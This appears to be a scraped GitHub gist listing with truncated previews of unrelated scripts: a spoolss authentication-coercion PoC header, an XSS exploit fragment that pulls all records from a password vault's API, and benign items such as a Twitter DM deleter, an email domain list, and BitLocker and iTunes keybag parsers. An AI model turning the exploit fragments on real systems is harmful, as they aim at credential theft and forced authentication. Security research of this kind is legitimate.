3xocyte
/ dementor.py
Last active
October 17, 2025 18:28
rough PoC to connect to spoolss to elicit machine account authentication
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| # abuse cases and better implementation from the original discoverer: https://github.com/leechristensen/SpoolSample | |
| # some code from https://www.exploit-db.com/exploits/2879/ | |
| import os | |
| import sys | |
| import argparse | |
| import binascii | |
| import ConfigParser |
shawarkhanethicalhacker
/ password_vault_exploit.js
Created
August 20, 2018 07:26
XSS Exploit code for retrieving passwords stored in a Password Vault
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| //Exploit Code by Shawar Khan | |
| var data_chunks = ''; | |
| // Capturing Records from API | |
| fetch('https://redacted.com/api/v3/records/all').then((resp) => resp.text()).then(function(data) { | |
| // Holds the records in as String | |
| var allrecords = data; | |
| // converting response to JSON |
taviso
/ delete-twitter-dm.js
Created
November 3, 2017 16:33
Automate deleting twitter direct messages.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // Open direct messages window, paste this into console. | |
| function deleteNextConversation() | |
| { | |
| if (!(dm = document.getElementsByClassName("DMInbox-conversationItem")[0])) { | |
| clearInterval(tmr) | |
| return; | |
| } | |
| dm.firstChild.click(); | |
| setTimeout('document.getElementsByClassName("js-actionDeleteConversation")[0].click()', 1000); |
ammarshah
/ all_email_provider_domains.txt
Last active
October 22, 2025 20:07
A list of all email provider domains (free, paid, blacklist etc). Some of these are probably not around anymore. I've combined a dozen lists from around the web. Current "major providers" should all be in here as of the date this is created.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 0-mail.com | |
| 007addict.com | |
| 020.co.uk | |
| 027168.com | |
| 0815.ru | |
| 0815.su | |
| 0clickemail.com | |
| 0sg.net | |
| 0wnd.net | |
| 0wnd.org |
mainframed
/ dosbox_ppp.sh
Last active
September 19, 2025 12:14
This script lets you connect Windows 3.11 to the internet with PPP and Trumpet WinSock in DOSBox
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # | |
| # Heavily Modified from: https://www.dosbox.com/wiki/PPP_configuration_on_linux_host | |
| # | |
| # Usage: | |
| # sudo ./isp.sh | |
| # | |
| # This script makes it so you can browse the net with DOSBox and Trumpet Winsock in | |
| # Windows 3.11 | |
| # |
abstractart
/ books.md
Last active
May 26, 2025 16:54
Free Programming Ebooks - O'Reilly Media. Codeship free ebooks here - https://bit.ly/2oQ0knQ
This file has been truncated, but you can view the full file.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| . | |
| .. | |
| ........ | |
| @ | |
| * | |
| *.* | |
| *.*.* | |
| 🎠|
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #define BITLOCKER_SIGNATURE "-FVE-FS-" | |
| #define BITLOCKER_SIGNATURE_SIZE sizeof(BITLOCKER_SIGNATURE) | |
| #pragma pack(push,1) | |
| typedef struct _FVEFS_BOOT_RECORD { | |
| BYTE JumpCode[3]; //+0x0 | |
| BYTE Signature[8]; //+0x3 | |
| WORD SectorSize; //+0xB | |
| BYTE SectorsPerCluster; //+0xD | |
| WORD ReservedClusters; //+0xE |
geekman
/ parse_keybag.py
Created
March 3, 2017 17:58
extract & parse the BackupKeyBag from an iTunes Backup
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| # | |
| # extracts and parse BackupKeyBag | |
| # | |
| # 2017.02.04 darell tan | |
| # | |
| from plist import * | |
| import struct | |
| import sys |
lnattrass
/ get_tds_cert.py
Last active
September 24, 2025 15:39
A terrible way to connect to MS SQL Server and dump the certificate as a PEM
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import sys | |
| import pprint | |
| import struct | |
| import socket | |
| import ssl | |
| from time import sleep | |
| # Standard "HELLO" message for TDS | |
| prelogin_msg = bytearray([ 0x12, 0x01, 0x00, 0x2f, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x1a, 0x00, 0x06, 0x01, 0x00, 0x20, | |
| 0x00, 0x01, 0x02, 0x00, 0x21, 0x00, 0x01, 0x03, 0x00, 0x22, 0x00, 0x04, 0x04, 0x00, 0x26, 0x00, |